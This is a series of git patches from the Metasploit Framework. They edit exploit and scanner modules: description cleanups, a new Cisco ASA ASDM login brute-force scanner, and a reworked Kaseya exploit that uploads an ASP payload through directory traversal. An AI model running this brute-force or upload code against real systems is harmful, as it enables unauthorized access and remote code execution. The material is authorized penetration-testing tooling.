index 63f8c22fd2..e072425d9f 100644
--- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
@@ -15,7 +15,11 @@ class Metasploit3 < Msf::Auxiliary
       'Name'        => 'ZyXEL GS1510-16 Password Extractor',
       'Description' => %q{
           This module exploits a vulnerability in ZyXEL GS1510-16 routers
-          to extract the admin password.
+          to extract the admin password. Due to a lack of authentication on the
+          webctrl.cgi script, unauthenticated attackers can recover the
+          administrator password for these devices. The vulnerable device
+          has reached end of life for support from the manufacturer, so it is
+          unlikely this problem will be addressed.
       },
       'References'  =>
         [
@@ -72,4 +76,4 @@ class Metasploit3 < Msf::Auxiliary
     return
   end
   end
-end
\ No newline at end of file
+end
diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb
index bb572d898b..dc6ff3b0c0 100644
--- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb
+++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb
@@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'OpenMind Message-OS Portal Login Brute Force Utility',
       'Description'    => %{
-        This module scans for OpenMind Message-OS provisioning web login portal, and performs login brute force
-        to identify valid credentials.
+        This module scans for OpenMind Message-OS provisioning web login portal, and
+        performs a login brute force attack to identify valid credentials.
       },
       'Author'         =>
         [
diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
index 3df56764ac..f180ec8f9a 100644
--- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb
+++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
@@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Oracle ILO Manager Login Brute Force Utility',
       'Description'    => %{
-        This module scans for Oracle Integrated Lights Out Manager login portal, and performs login brute force
-        to identify valid credentials.
+        This module scans for Oracle Integrated Lights Out Manager (ILO) login portal, and
+        performs a login brute force attack to identify valid credentials.
       },
       'Author'         =>
         [
diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb
index 7dd63676a4..f2085b65ce 100644
--- a/modules/exploits/linux/http/netgear_readynas_exec.rb
+++ b/modules/exploits/linux/http/netgear_readynas_exec.rb
@@ -15,10 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => 'NETGEAR ReadyNAS Perl Code Evaluation',
       'Description'    => %q{
         This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
-        vulnerability exists on the web fronted, specifically on the np_handler.pl component,
-        due to the insecure usage of the eval() perl function. This module has been tested
-        successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real
-        hardware.
+        vulnerability exists on the web front end, specifically in the np_handler.pl component,
+        due to an insecure usage of the eval() perl function. This module has been tested
+        successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment.
       },
       'Author'         =>
         [
@@ -49,6 +48,8 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Targets'        =>
         [
+          # Tested on an emulated environment, need to check this
+          # against a real device
           [ 'NETGEAR ReadyNAS 4.2.23', { }]
         ],
       'DefaultOptions' =>
diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb
index c599d9da29..38ad1d8c45 100644
--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'        => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
       'Description' => %q{
         This module exploits a code execution flaw in Cisco Data Center Network Manager. The
-        vulnerability exists on the processImageSave.jsp, which can be abused through a directory
+        vulnerability exists in processImageSave.jsp, which can be abused through a directory
         traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
         application server feature is used to achieve remote code execution. This module has been
         tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb
index 140b4aff05..83c597d009 100644
--- a/modules/exploits/unix/webapp/kimai_sqli.rb
+++ b/modules/exploits/unix/webapp/kimai_sqli.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'         =>
         [
           'drone (@dronesec)', # Discovery and PoC
-          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
         ],
       'References'     =>
         [
diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
index 997746dbf3..aad80f2983 100644
--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access",
       'Description'    => %q{
-        This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on
+        This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on
         the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an
         unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible
         to dereference arbitrary memory which easily leverages to arbitrary code execution. In order
diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb
index 11e7f5701a..af8ddc5df0 100644
--- a/modules/exploits/windows/scada/abb_wserver_exec.rb
+++ b/modules/exploits/windows/scada/abb_wserver_exec.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
         component, which allows arbitrary commands. The component is disabled by default, but
         required when a project uses the SCIL function WORKSTATION_CALL.
 
-        This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 over
+        This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on
         Windows XP SP3 and Windows 7 SP1.
       },
       'License'        => MSF_LICENSE,

From c32b734680e61b5bebf1419d8506fc3a6cf283a1 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 2 Dec 2013 16:24:21 -0600
Subject: [PATCH 156/217] Fix regex

---
 modules/exploits/unix/webapp/php_wordpress_optimizepress.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
index d9da98b370..945a7ef180 100644
--- a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
@@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     payload_url = ""
 
-    if res.body =~ /name="cs_img" value="(.*#{file_path}.*)" \/> <span/
+    if res.body =~ /name="cs_img" value="(.*#{filename}.*)" \/> <span/
       payload_url =$1
     else
       fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload")

From 5c3ca1c8ec0f99c6f83b5c01fb138ee2b0b332cb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 2 Dec 2013 16:30:01 -0600
Subject: [PATCH 157/217] Fix title

---
 modules/exploits/unix/webapp/php_wordpress_optimizepress.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
index 945a7ef180..d3c28d3f32 100644
--- a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'WordPress OptimizePress Themes File Upload Vulnerability',
+      'Name'            => 'WordPress OptimizePress Theme File Upload Vulnerability',
       'Description'     => %q{
         This module exploits a vulnerability found in the the Wordpress theme OptimizePress. The
         vulnerability is due to an insecure file upload on the media-upload.php component, allowing

From 21bb8fd25a53e2803e3663753aaf869459abaabd Mon Sep 17 00:00:00 2001
From: Thomas Hibbert <thomas.hibbert@security-assessment.com>
Date: Tue, 3 Dec 2013 13:49:31 +1300
Subject: [PATCH 158/217] Update based on jvazquez's suggestions.

---
 .../http/kaseya_uploadimage_file_upload.rb       | 16 +++++++++++-----
 1 file changed, 11 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
index a73caed524..595dc32c4e 100644
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -26,7 +26,12 @@ class Metasploit3 < Msf::Exploit::Remote
                           'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
         ],
       'License'        => MSF_LICENSE,
-      'References'     => [['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']],
+      'References'     => [
+                           ['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf'],
+                           ['OSVDB', '99984'],
+                           ['BID', '63782'],
+                           ['EDB', '29675']
+                          ],
       'Payload'        => {},
       'Platform'       => 'win',
       'Arch'           => ARCH_X86,
@@ -47,15 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote
     # the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
 
     if not res or res.code != 500
-      return Exploit::Faliure::UnexpectedReply
+      return Exploit::CheckCode::Unknown
     end
 
     return Exploit::CheckCode::Appears
   end
 
   def exploit
-    peer = "#{rhost}:#{rport}"
-
     @payload_name = "#{rand_text_alpha_lower(8)}.asp"
     exe  = generate_payload_exe
     asp  = Msf::Util::EXE.to_exe_asp(exe)
@@ -74,7 +77,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_request_cgi({
       "method" => "POST",
-      "uri"    => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"),
+      "uri"    => normalize_uri("SystemTab","uploadImage.asp"),
+      "vars_get" => {
+        "filename" => "..\\..\\..\\..\\#{@payload_name}"
+        },
       "data"   => data,
       "ctype"  => "multipart/form-data; boundary=#{post_data.bound}",
       "cookie" => cookie

From c91d190d394bbe411b2395fb8dea54465f72ed9e Mon Sep 17 00:00:00 2001
From: Jonathan Claudius <jclaudius@trustwave.com>
Date: Tue, 3 Dec 2013 00:16:04 -0500
Subject: [PATCH 159/217] Add Cisco ASA ASDM Login

---
 .../auxiliary/scanner/http/cisco_asa_asdm.rb  | 135 ++++++++++++++++++
 1 file changed, 135 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/cisco_asa_asdm.rb

diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
new file mode 100644
index 0000000000..1c485edf47
--- /dev/null
+++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/http'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Cisco ASA ASDM Bruteforce Login Utility',
+      'Description'    => %{
+        This module scans for Cisco ASA ASDM web login portals and 
+        performs login brute force to identify valid credentials.
+      },
+      'Author'         =>
+        [
+          'Jonathan Claudius <jclaudius[at]trustwave.com>',
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
+        OptString.new('USERNAME', [true, "A specific username to authenticate as", 'cisco']),
+        OptString.new('PASSWORD', [true, "A specific password to authenticate with", 'cisco'])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    unless check_conn?
+      print_error("#{rhost}:#{rport} - Connection failed, Aborting...")
+      return
+    end
+
+    unless is_app_asdm?
+      print_error("#{rhost}:#{rport} - Application does not appear to be Cisco ASA ASDM. Module will not continue.")
+      return
+    end
+
+    print_status("#{rhost}:#{rport} - Application appears to be Cisco ASA ASDM. Module will continue.")
+
+    print_status("#{rhost}:#{rport} - Starting login brute force...")
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  # Verify whether the connection is working or not
+  def check_conn?
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/',
+        'method'    => 'GET'
+      })
+      print_good("#{rhost}:#{rport} - Server is responsive...")
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      return
+    end
+  end
+
+  # Verify whether we're working with ASDM or not
+  def is_app_asdm?
+      res = send_request_raw(
+      {
+        'uri'       => '/+webvpn+/index.html',
+        'method'    => 'GET',
+        'headers' => {
+          'User-Agent' => 'ASDM/ Java/1.6.0_65'
+        }
+      })
+
+      if res.code == 200 &&
+         res.headers['Set-Cookie'].match(/webvpn/)
+         return true
+      else
+        return false
+      end
+  end
+
+  # Brute-force the login page
+  def do_login(user, pass)
+    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    begin
+      res = send_request_raw({
+        'uri'       => '/+webvpn+/index.html',
+        'method'    => 'POST',
+        'headers' => {
+          'User-Agent' => 'ASDM/ Java/1.6.0_65',
+          'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
+          'Cookie'    => 'webvpnlogin=1; tg=0DefaultADMINGroup'
+        },
+        'data' => "username=#{user}&password=#{pass}&tgroup=DefaultADMINGroup"
+      })
+
+      if res.code == 200 &&
+         res.body.match(/SSL VPN Service/) &&
+         res.body.match(/Success/) &&
+         res.body.match(/success/)
+
+        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+
+        report_hash = {
+          :host   => rhost,
+          :port   => rport,
+          :sname  => 'Cisco ASA ASDM',
+          :user   => user,
+          :pass   => pass,
+          :active => true,
+          :type => 'password'
+        }
+
+        report_auth_info(report_hash)
+        return :next_user
+
+      else
+        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+      end
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
+      return :abort
+    end
+  end
+end
\ No newline at end of file

From 0480e01830b6d8c0f9313e4dae6f79c6ae7d97d4 Mon Sep 17 00:00:00 2001
From: Jonathan Claudius <jclaudius@trustwave.com>
Date: Tue, 3 Dec 2013 00:45:57 -0500
Subject: [PATCH 160/217] Account for nil res value

---
 modules/auxiliary/scanner/http/cisco_asa_asdm.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
index 1c485edf47..734cfec024 100644
--- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
+++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
@@ -80,8 +80,7 @@ class Metasploit3 < Msf::Auxiliary
         }
       })
 
-      if res.code == 200 &&
-         res.headers['Set-Cookie'].match(/webvpn/)
+      if res && res.code == 200 && res.headers['Set-Cookie'].match(/webvpn/)
          return true
       else
         return false

From b79609558297e57cefb2457a242ebb0a748e6760 Mon Sep 17 00:00:00 2001
From: Jonathan Claudius <jclaudius@trustwave.com>
Date: Tue, 3 Dec 2013 00:49:05 -0500
Subject: [PATCH 161/217] Use peer vs. rhost and rport for prints

---
 .../auxiliary/scanner/http/cisco_asa_asdm.rb   | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
index 734cfec024..4aae1843ca 100644
--- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
+++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
@@ -38,18 +38,18 @@ class Metasploit3 < Msf::Auxiliary
 
   def run_host(ip)
     unless check_conn?
-      print_error("#{rhost}:#{rport} - Connection failed, Aborting...")
+      print_error("#{peer} - Connection failed, Aborting...")
       return
     end
 
     unless is_app_asdm?
-      print_error("#{rhost}:#{rport} - Application does not appear to be Cisco ASA ASDM. Module will not continue.")
+      print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Application appears to be Cisco ASA ASDM. Module will continue.")
+    print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.")
 
-    print_status("#{rhost}:#{rport} - Starting login brute force...")
+    print_status("#{peer} - Starting login brute force...")
     each_user_pass do |user, pass|
       do_login(user, pass)
     end
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
         'uri'       => '/',
         'method'    => 'GET'
       })
-      print_good("#{rhost}:#{rport} - Server is responsive...")
+      print_good("#{peer} - Server is responsive...")
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
       return
     end
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
 
   # Brute-force the login page
   def do_login(user, pass)
-    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
     begin
       res = send_request_raw({
         'uri'       => '/+webvpn+/index.html',
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary
          res.body.match(/Success/) &&
          res.body.match(/success/)
 
-        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+        print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
         report_hash = {
           :host   => rhost,
@@ -123,11 +123,11 @@ class Metasploit3 < Msf::Auxiliary
         return :next_user
 
       else
-        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+        vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
       end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
+      print_error("#{peer} - HTTP Connection Failed, Aborting")
       return :abort
     end
   end

From 14e600a4313a891653d92f2e3431ee9c99237194 Mon Sep 17 00:00:00 2001
From: Jonathan Claudius <jclaudius@trustwave.com>
Date: Tue, 3 Dec 2013 00:51:19 -0500
Subject: [PATCH 162/217] Clean up res nil checking

---
 modules/auxiliary/scanner/http/cisco_asa_asdm.rb | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
index 4aae1843ca..bb1fcf4d06 100644
--- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
+++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
@@ -80,8 +80,11 @@ class Metasploit3 < Msf::Auxiliary
         }
       })
 
-      if res && res.code == 200 && res.headers['Set-Cookie'].match(/webvpn/)
-         return true
+      if res &&
+         res.code == 200 &&
+         res.headers['Set-Cookie'].match(/webvpn/)
+         
+        return true
       else
         return false
       end
@@ -102,7 +105,8 @@ class Metasploit3 < Msf::Auxiliary
         'data' => "username=#{user}&password=#{pass}&tgroup=DefaultADMINGroup"
       })
 
-      if res.code == 200 &&
+      if res &&
+         res.code == 200 &&
          res.body.match(/SSL VPN Service/) &&
          res.body.match(/Success/) &&
          res.body.match(/success/)

From e37f7d3643ffbbb3b6d4e8ffff82d1bc0879b5c6 Mon Sep 17 00:00:00 2001
From: Jonathan Claudius <jclaudius@trustwave.com>
Date: Tue, 3 Dec 2013 00:57:26 -0500
Subject: [PATCH 163/217] Use send_request_cgi instead of send_request_raw

---
 .../auxiliary/scanner/http/cisco_asa_asdm.rb  | 24 +++++++++----------
 1 file changed, 12 insertions(+), 12 deletions(-)

diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
index bb1fcf4d06..78a10dec57 100644
--- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
+++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
@@ -71,19 +71,17 @@ class Metasploit3 < Msf::Auxiliary
 
   # Verify whether we're working with ASDM or not
   def is_app_asdm?
-      res = send_request_raw(
+      res = send_request_cgi(
       {
         'uri'       => '/+webvpn+/index.html',
         'method'    => 'GET',
-        'headers' => {
-          'User-Agent' => 'ASDM/ Java/1.6.0_65'
-        }
+        'agent'     => 'ASDM/ Java/1.6.0_65'
       })
 
       if res &&
          res.code == 200 &&
          res.headers['Set-Cookie'].match(/webvpn/)
-         
+
         return true
       else
         return false
@@ -94,15 +92,17 @@ class Metasploit3 < Msf::Auxiliary
   def do_login(user, pass)
     vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
     begin
-      res = send_request_raw({
+      res = send_request_cgi({
         'uri'       => '/+webvpn+/index.html',
         'method'    => 'POST',
-        'headers' => {
-          'User-Agent' => 'ASDM/ Java/1.6.0_65',
-          'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
-          'Cookie'    => 'webvpnlogin=1; tg=0DefaultADMINGroup'
-        },
-        'data' => "username=#{user}&password=#{pass}&tgroup=DefaultADMINGroup"
+        'agent'     => 'ASDM/ Java/1.6.0_65',
+        'ctype'     => 'application/x-www-form-urlencoded; charset=UTF-8',
+        'cookie'    => 'webvpnlogin=1; tg=0DefaultADMINGroup',
+        'vars_post' => {
+          'username' => user,
+          'password' => pass,
+          'tgroup'   => 'DefaultADMINGroup'
+        }
       })
 
       if res &&

From 99dc9f9e7e99d1d1ba5b4095cac1a2e98abaf547 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 3 Dec 2013 00:09:51 -0600
Subject: [PATCH 164/217] Fix msftidy warning

---
 modules/auxiliary/scanner/http/cisco_asa_asdm.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
index 78a10dec57..4cd4492430 100644
--- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
+++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'Cisco ASA ASDM Bruteforce Login Utility',
       'Description'    => %{
-        This module scans for Cisco ASA ASDM web login portals and 
+        This module scans for Cisco ASA ASDM web login portals and
         performs login brute force to identify valid credentials.
       },
       'Author'         =>

From 2606a6ff0e8246819c9fead1d1d8c18b993bca43 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 3 Dec 2013 09:34:25 -0600
Subject: [PATCH 165/217] Do minor clean up for kaseya_uploadimage_file_upload

---
 .../http/kaseya_uploadimage_file_upload.rb    | 55 ++++++++++---------
 1 file changed, 29 insertions(+), 26 deletions(-)

diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
index 595dc32c4e..75d737b9d5 100644
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -17,24 +17,25 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Kaseya uploadImage Arbitrary File Upload',
       'Description'    => %q{
-        This module exploits an arbitrary file upload vulnerability found in Kaseya versions below 6.3.0.2.
-        A malicious user can upload an ASP file to an arbitrary directory without authentication, leading to arbitrary code execution.
-        Code executed in this manner runs under an IUSR account.
+        This module exploits an arbitrary file upload vulnerability found in Kaseya versions below
+        6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous
+        authentication, leading to arbitrary code execution with IUSR privileges.
       },
       'Author'         =>
         [
-                          'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
+          'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
         ],
       'License'        => MSF_LICENSE,
-      'References'     => [
-                           ['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf'],
-                           ['OSVDB', '99984'],
-                           ['BID', '63782'],
-                           ['EDB', '29675']
-                          ],
-      'Payload'        => {},
+      'References'     =>
+        [
+          ['OSVDB', '99984'],
+          ['BID', '63782'],
+          ['EDB', '29675'],
+          ['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']
+        ],
       'Platform'       => 'win',
       'Arch'           => ARCH_X86,
+      'Privileged'     => false,
       'Targets'        =>
         [
           [ 'Kaseya KServer / Windows', {} ],
@@ -50,8 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     # the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
-
-    if not res or res.code != 500
+    unless res and res.code == 500
       return Exploit::CheckCode::Unknown
     end
 
@@ -59,34 +59,37 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @payload_name = "#{rand_text_alpha_lower(8)}.asp"
-    exe  = generate_payload_exe
-    asp  = Msf::Util::EXE.to_exe_asp(exe)
-
-    post_data = Rex::MIME::Message.new
-    post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}")
-
-    data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
-
+    print_status("#{peer} - Getting cookie...")
     res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri("SystemTab", "uploadImage.asp")
     })
 
-    cookie = res.get_cookies
+    unless res and res.code == 500 and res.headers and res.headers.include?('Set-Cookie')
+      fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to get cookie")
+    end
 
+    cookie = res.get_cookies
+    @payload_name = "#{rand_text_alpha_lower(8)}.asp"
+    exe  = generate_payload_exe
+    asp  = Msf::Util::EXE.to_exe_asp(exe)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}")
+    data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+    print_status("#{peer} - Uploading payload...")
     res = send_request_cgi({
       "method" => "POST",
-      "uri"    => normalize_uri("SystemTab","uploadImage.asp"),
+      "uri"    => normalize_uri("SystemTab", "uploadImage.asp"),
       "vars_get" => {
         "filename" => "..\\..\\..\\..\\#{@payload_name}"
-        },
+      },
       "data"   => data,
       "ctype"  => "multipart/form-data; boundary=#{post_data.bound}",
       "cookie" => cookie
     })
 
-    if not res or res.code != 200
+    unless res and res.code == 200
       fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 

From 230db6451b42a1ec574073fe099a55994fd928e8 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 3 Dec 2013 12:58:16 -0600
Subject: [PATCH 166/217] Remove @peer for modules that use HttpClient

The HttpClient mixin has a peer() method, therefore these modules
should not have to make their own. Also new module writers won't
repeat the same old code again.
---
 .../admin/http/axigen_file_access.rb          | 30 ++++++-----
 .../auxiliary/admin/http/iis_auth_bypass.rb   |  8 ++-
 .../admin/http/intersil_pass_reset.rb         | 21 ++++----
 .../admin/http/mutiny_frontend_read_delete.rb | 26 +++++-----
 .../admin/http/sophos_wpa_traversal.rb        | 14 +++---
 .../auxiliary/scanner/http/dolibarr_login.rb  | 17 +++----
 ...hp_sitescope_getfileinternal_fileaccess.rb | 21 ++++----
 .../hp_sitescope_getsitescopeconfiguration.rb | 19 ++++---
 ...hp_sitescope_loadfilecontent_fileaccess.rb | 13 +++--
 modules/auxiliary/scanner/http/vcms_login.rb  |  9 ++--
 .../linux/http/mutiny_frontend_upload.rb      | 18 +++----
 .../linux/http/openfiler_networkcard_exec.rb  | 13 ++---
 modules/exploits/linux/http/wanem_exec.rb     | 14 +++---
 .../linux/http/zen_load_balancer_exec.rb      | 11 ++--
 .../http/zenoss_showdaemonxmlconfig_exec.rb   | 17 +++----
 .../multi/http/auxilium_upload_exec.rb        | 10 ++--
 .../multi/http/cuteflow_upload_exec.rb        |  7 ++-
 .../multi/http/extplorer_upload_exec.rb       | 38 +++++++-------
 .../multi/http/glossword_upload_exec.rb       | 29 ++++++-----
 .../http/hp_sitescope_uploadfileshandler.rb   | 29 ++++++-----
